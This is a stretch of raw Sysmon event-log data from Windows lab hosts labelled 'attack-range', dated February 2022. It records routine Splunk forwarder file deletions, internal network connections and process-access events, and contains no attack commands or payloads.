Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAD1890473CE34C1CB786771710D5294,SHA256=ACACED9D37C3E6089DD63CCB03A10EA5F824D7949EF7DAA7EE31F454E7D593CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289256Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:39.877{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289255Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:39.608{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BBAD514FC473125246A4CF4A14FD855F,SHA256=1D01C59A7E59BABF68B9AE985E46390C2E9D864DB4CB3BDB2CFF17769CA87760,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217109Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:39.064{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4A0E13FEF144F1DF34FFF2A1E9253A7,SHA256=C4EBB048000DB675A8394E5D803E86C6279F88945B76941EF37F89277782D948,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217111Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:40.158{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE5BBB26717ADCE4F088F4E5538C03AC,SHA256=005070BFDF03E01F498E57102E71C34AB0AF584932DD62995870EFC119086753,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289257Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:40.609{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29B9DDFCADD7E7E3A8CE96F10A67FD5D,SHA256=E57B41E99F2BF16D0892246C5163070DCB40B78872049E26F1C30CCE473A396E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217110Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:37.680{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51374-false10.0.1.12-8000- 23542300x8000000000000000217112Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:41.392{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C01AE74CCEE9FAAF89BC423728E9ECCE,SHA256=B8CC2913FDCB1866D2269C9D2A723132F021367453264056B45D016EE94428B1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289259Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:39.351{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53517-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000289258Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:41.644{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F527C9BB91482AB7323DB40BAFEC5584,SHA256=54DABAFEFD83C70FB9E6ABA66A0A5F0A4259337869C47C934FE83F85B1877AB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217113Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:42.611{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09D3CE9D14E50DC1B315FDED1302FDDC,SHA256=975DE361FA268380E8E2A75A667F56AEDFACC2DE015C5F2961E3E1F3E2C1AA3A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289261Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:40.566{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53518-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000289260Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:42.662{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30CD6273EF1D3E522F17716AE2AD6397,SHA256=28BA5173E6B5136AA2475BD02C114E2C0F4D537E3274D0A21A14D6B24BF84FDC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289262Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:43.665{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2F4F4C8D0E206EB2FE16B3FBD40FC6A,SHA256=07C3EEFE07A1989FAE562FB5081FE4229B78678408D54D07D55E8AD2A2C937DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217114Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:43.611{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB7D6255CA2F3F22FA3AC82E5FBA5948,SHA256=78CB18F6F8ABF9751D190D6789051BA11FBE3CB1BF5E22791ABB251FDC690EF1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217128Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:44.986{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1238-6216-6C04-000000003902}516C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217127Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:44.986{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217126Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:44.986{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217125Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:44.986{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217124Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:44.986{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217123Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:44.986{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217122Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:44.986{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217121Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:44.986{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217120Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:44.986{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217119Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:44.986{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217118Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:44.986{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1238-6216-6C04-000000003902}516C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217117Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:44.986{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1238-6216-6C04-000000003902}516C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217116Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:44.987{4F8D34B0-1238-6216-6C04-000000003902}516C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000217115Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:44.611{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A2104FF2E863BC021786F7382A58343,SHA256=9258AA86F504374ADC5635E0B94F26A32962FCECC253D9EE42679DEB7416183F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289263Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:44.696{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E975938AA7D0795CFB54BDD8A043CF4A,SHA256=CE816ACC87B15139376A7DF25322B69DF6A221576DA270A78D25905EED1CF506,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217143Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:45.846{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7FD06A4B26F77907B5BF53EEBAB4D42,SHA256=10BA6A922AFD8E07EA851EF00CCB5F27F45EF3FD2DB569EF50E6486EB602E34E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289265Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:45.765{C8EA50B7-F11F-6215-0D00-000000003802}8883340C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000289264Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:45.696{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=210E3F3752991BBB0B49248931ACA04E,SHA256=65B21FD002988D3E9F4507258D2CA074069D14E6C40973210989B82FF199E0AC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217142Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:45.486{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1239-6216-6D04-000000003902}3052C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217141Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:45.486{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217140Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:45.486{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217139Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 